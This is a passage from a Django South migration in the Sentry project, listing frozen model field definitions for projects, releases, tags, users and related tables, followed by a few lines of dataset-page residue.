'to': "orm['sentry.Team']"
}
)
},
'sentry.organizationonboardingtask': {
'Meta': {
'unique_together': "(('organization', 'task'),)",
'object_name': 'OrganizationOnboardingTask'
},
'data': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_completed':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'project_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'task': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'null': 'True'
}
)
},
'sentry.organizationoption': {
'Meta': {
'unique_together': "(('organization', 'key'),)",
'object_name': 'OrganizationOption',
'db_table': "'sentry_organizationoptions'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.project': {
'Meta': {
'unique_together': "(('team', 'slug'), ('organization', 'slug'))",
'object_name': 'Project'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'first_event': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'forced_color': (
'django.db.models.fields.CharField', [], {
'max_length': '6',
'null': 'True',
'blank': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '200'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'public': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'slug': ('django.db.models.fields.SlugField', [], {
'max_length': '50',
'null': 'True'
}),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
),
'team': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Team']"
}
)
},
'sentry.projectbookmark': {
'Meta': {
'unique_together': "(('project_id', 'user'),)",
'object_name': 'ProjectBookmark'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.projectdsymfile': {
'Meta': {
'unique_together': "(('project', 'uuid'),)",
'object_name': 'ProjectDSymFile'
},
'cpu_name': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object_name': ('django.db.models.fields.TextField', [], {}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'uuid': ('django.db.models.fields.CharField', [], {
'max_length': '36'
})
},
'sentry.projectkey': {
'Meta': {
'object_name': 'ProjectKey'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'label': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True',
'blank': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'key_set'",
'to': "orm['sentry.Project']"
}
),
'public_key': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'unique': 'True',
'null': 'True'
}
),
'roles': ('django.db.models.fields.BigIntegerField', [], {
'default': '1'
}),
'secret_key': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'unique': 'True',
'null': 'True'
}
),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
)
},
'sentry.projectoption': {
'Meta': {
'unique_together': "(('project', 'key'),)",
'object_name': 'ProjectOption',
'db_table': "'sentry_projectoptions'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.projectplatform': {
'Meta': {
'unique_together': "(('project_id', 'platform'),)",
'object_name': 'ProjectPlatform'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'platform': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.release': {
'Meta': {
'unique_together': "(('project', 'version'),)",
'object_name': 'Release'
},
'data': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'date_released':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'blank': 'True'
}),
'date_started':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'blank': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'new_groups':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'owner': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'null': 'True',
'blank': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'ref': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True',
'blank': 'True'
}
),
'url': (
'django.db.models.fields.URLField', [], {
'max_length': '200',
'null': 'True',
'blank': 'True'
}
),
'version': ('django.db.models.fields.CharField', [], {
'max_length': '64'
})
},
'sentry.releasecommit': {
'Meta': {
'unique_together': "(('release', 'commit'), ('release', 'order'))",
'object_name': 'ReleaseCommit'
},
'commit': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Commit']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'project_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']"
}
)
},
'sentry.releaseenvironment': {
'Meta': {
'unique_together': "(('project_id', 'release_id', 'environment_id'),)",
'object_name': 'ReleaseEnvironment',
'db_table': "'sentry_environmentrelease'"
},
'environment_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'first_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'project_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'release_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.releasefile': {
'Meta': {
'unique_together': "(('release', 'ident'),)",
'object_name': 'ReleaseFile'
},
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'name': ('django.db.models.fields.TextField', [], {}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']"
}
)
},
'sentry.repository': {
'Meta': {
'unique_together': "(('organization_id', 'name'),)",
'object_name': 'Repository'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '200'
}),
'organization_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.rule': {
'Meta': {
'object_name': 'Rule'
},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'label': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
)
},
'sentry.savedsearch': {
'Meta': {
'unique_together': "(('project', 'name'),)",
'object_name': 'SavedSearch'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_default': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'query': ('django.db.models.fields.TextField', [], {})
},
'sentry.savedsearchuserdefault': {
'Meta': {
'unique_together': "(('project', 'user'),)",
'object_name': 'SavedSearchUserDefault',
'db_table': "'sentry_savedsearch_userdefault'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'savedsearch': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.SavedSearch']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.tagkey': {
'Meta': {
'unique_together': "(('project', 'key'),)",
'object_name': 'TagKey',
'db_table': "'sentry_filterkey'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'label':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'values_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.tagvalue': {
'Meta': {
'unique_together': "(('project', 'key', 'value'),)",
'object_name': 'TagValue',
'db_table': "'sentry_filtervalue'"
},
'data': (
'sentry.db.models.fields.gzippeddict.GzippedDictField', [], {
'null': 'True',
'blank': 'True'
}
),
'first_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'times_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'value': ('django.db.models.fields.CharField', [], {
'max_length': '200'
})
},
'sentry.team': {
'Meta': {
'unique_together': "(('organization', 'slug'),)",
'object_name': 'Team'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'slug': ('django.db.models.fields.SlugField', [], {
'max_length': '50'
}),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.user': {
'Meta': {
'object_name': 'User',
'db_table': "'auth_user'"
},
'date_joined':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email':
('django.db.models.fields.EmailField', [], {
'max_length': '75',
'blank': 'True'
}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {
'primary_key': 'True'
}),
'is_active': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'is_managed': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'is_password_expired':
('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'is_staff': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'last_login':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'last_password_change': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'name': (
'django.db.models.fields.CharField', [], {
'max_length': '200',
'db_column': "'first_name'",
'blank': 'True'
}
),
'password': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'username':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '128'
})
},
'sentry.useravatar': {
'Meta': {
'object_name': 'UserAvatar'
},
'avatar_type':
('django.db.models.fields.PositiveSmallIntegerField', [], {
'default': '0'
}),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']",
'unique': 'True',
'null': 'True',
'on_delete': 'models.SET_NULL'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident': (
'django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '32',
'db_index': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'avatar'",
'unique': 'True',
'to': "orm['sentry.User']"
}
)
},
'sentry.useremail': {
'Meta': {
'unique_together': "(('user', 'email'),)",
'object_name': 'UserEmail'
},
'date_hash_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_verified': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'emails'",
'to': "orm['sentry.User']"
}
),
'validation_hash': (
'django.db.models.fields.CharField', [], {
'default': "u'M3q5J1slH8D6cKCdQ80XjNpgY9lanKSB'",
'max_length': '32'
}
)
},
'sentry.useroption': {
'Meta': {
'unique_together': "(('user', 'project', 'key'),)",
'object_name': 'UserOption'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.userreport': {
'Meta': {
'unique_together': "(('project', 'event_id'),)",
'object_name': 'UserReport',
'index_together': "(('project', 'event_id'), ('project', 'date_added'))"
},
'comments': ('django.db.models.fields.TextField', [], {}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'event_id': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
)
}
}
complete_apps = ['sentry']
|
bsd-3-clause
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.